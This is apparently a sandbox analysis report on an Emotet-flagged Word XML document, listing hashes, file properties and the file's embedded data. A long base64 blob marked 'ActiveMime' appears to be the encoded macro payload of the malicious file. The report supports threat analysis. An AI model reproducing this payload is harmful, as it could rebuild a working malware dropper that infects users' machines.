File name: | asdfasdf.doc |
Full analysis: | https://app.any.run/tasks/58bdfbb2-6049-4b3a-b87d-481904389cc3 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 23, 2019, 10:18:18 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/xml |
File info: | XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators |
MD5: | C8A65DCF63D22A1798385E7A9908A17B |
SHA1: | 224807E7D5A89718EAC50CF7D6A390A936118CB8 |
SHA256: | A6E5D329FDA48244000EF4AC47A2872DEEA0A005D662279934ED1B5430E1A33A |
SSDEEP: | 3072:Mbw+aINTjL/xSu90OoiLuDKZXfwKeljR1z:MWIN7xUOmD+XfwLX |
.xml | | | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1) |
---|---|---|
.xml | | | Microsoft Office XML Flat File Format (ASCII) (31) |
.xml | | | Generic XML (ASCII) (2.3) |
.html | | | HyperText Markup Language (1.4) |
WordDocumentBodySectSectPrDocGridLine-pitch: | 360 |
---|---|
WordDocumentBodySectSectPrColsSpace: | 720 |
WordDocumentBodySectSectPrPgMarGutter: | - |
WordDocumentBodySectSectPrPgMarFooter: | 720 |
WordDocumentBodySectSectPrPgMarHeader: | 720 |
WordDocumentBodySectSectPrPgMarLeft: | 1440 |
WordDocumentBodySectSectPrPgMarBottom: | 1440 |
WordDocumentBodySectSectPrPgMarRight: | 1440 |
WordDocumentBodySectSectPrPgMarTop: | 1440 |
WordDocumentBodySectSectPrPgSzH: | 15840 |
WordDocumentBodySectSectPrPgSzW: | 12240 |
WordDocumentBodySectSectPrRsidR: | 005E6EE1 |
WordDocumentBodySectPRPictShapeImagedataTitle: | - |
WordDocumentBodySectPRPictShapeImagedataSrc: | wordml://02000001.jpg |
WordDocumentBodySectPRPictShapeStyle: | width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square |
WordDocumentBodySectPRPictShapeType: | #_x0000_t75 |
WordDocumentBodySectPRPictShapeSpid: | _x0000_i1025 |
WordDocumentBodySectPRPictShapeId: | Picture 1 |
WordDocumentBodySectPRPictBinData: | (Binary data 145376 bytes, use -b option to extract) |
WordDocumentBodySectPRPictBinDataName: | wordml://02000001.jpg |
WordDocumentBodySectPRPictShapetypeLockAspectratio: | t |
WordDocumentBodySectPRPictShapetypeLockExt: | edit |
WordDocumentBodySectPRPictShapetypePathConnecttype: | rect |
WordDocumentBodySectPRPictShapetypePathGradientshapeok: | t |
WordDocumentBodySectPRPictShapetypePathExtrusionok: | f |
WordDocumentBodySectPRPictShapetypeFormulasFEqn: | if lineDrawn pixelLineWidth 0 |
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: | miter |
WordDocumentBodySectPRPictShapetypeStroked: | f |
WordDocumentBodySectPRPictShapetypeFilled: | f |
WordDocumentBodySectPRPictShapetypePath: | m@4@5l@4@11@9@11@9@5xe |
WordDocumentBodySectPRPictShapetypePreferrelative: | t |
WordDocumentBodySectPRPictShapetypeSpt: | 75 |
WordDocumentBodySectPRPictShapetypeCoordsize: | 21600,21600 |
WordDocumentBodySectPRPictShapetypeId: | _x0000_t75 |
WordDocumentBodySectPRRPrNoProof: | - |
WordDocumentBodySectPRRsidRPr: | 00F74043 |
WordDocumentBodySectPRsidRDefault: | 00D718DB |
WordDocumentBodySectPRsidR: | 005E6EE1 |
WordDocumentDocPrRsidsRsidVal: | 005A24B1 |
WordDocumentDocPrRsidsRsidRootVal: | 005E6EE1 |
WordDocumentDocPrCompatDontGrowAutofit: | - |
WordDocumentDocPrCompatUseAsianBreakRules: | - |
WordDocumentDocPrCompatWrapTextWithPunct: | - |
WordDocumentDocPrCompatSnapToGridInCell: | - |
WordDocumentDocPrCompatBreakWrappedTables: | - |
WordDocumentDocPrAlwaysShowPlaceholderTextVal: | off |
WordDocumentDocPrIgnoreMixedContentVal: | off |
WordDocumentDocPrSaveInvalidXMLVal: | off |
WordDocumentDocPrValidateAgainstSchema: | - |
WordDocumentDocPrPixelsPerInchVal: | 120 |
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: | - |
WordDocumentDocPrOptimizeForBrowser: | - |
WordDocumentDocPrCharacterSpacingControlVal: | DontCompress |
WordDocumentDocPrPunctuationKerning: | - |
WordDocumentDocPrDefaultTabStopVal: | 720 |
WordDocumentDocPrDoNotEmbedSystemFonts: | - |
WordDocumentDocPrRemovePersonalInformation: | - |
WordDocumentDocPrZoomPercent: | 100 |
WordDocumentDocPrViewVal: | |
WordDocumentShapeDefaultsShapelayoutIdmapData: | 1 |
WordDocumentShapeDefaultsShapelayoutIdmapExt: | edit |
WordDocumentShapeDefaultsShapelayoutExt: | edit |
WordDocumentShapeDefaultsShapedefaultsSpidmax: | 1026 |
WordDocumentShapeDefaultsShapedefaultsExt: | edit |
WordDocumentDocSuppDataBinData: | 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 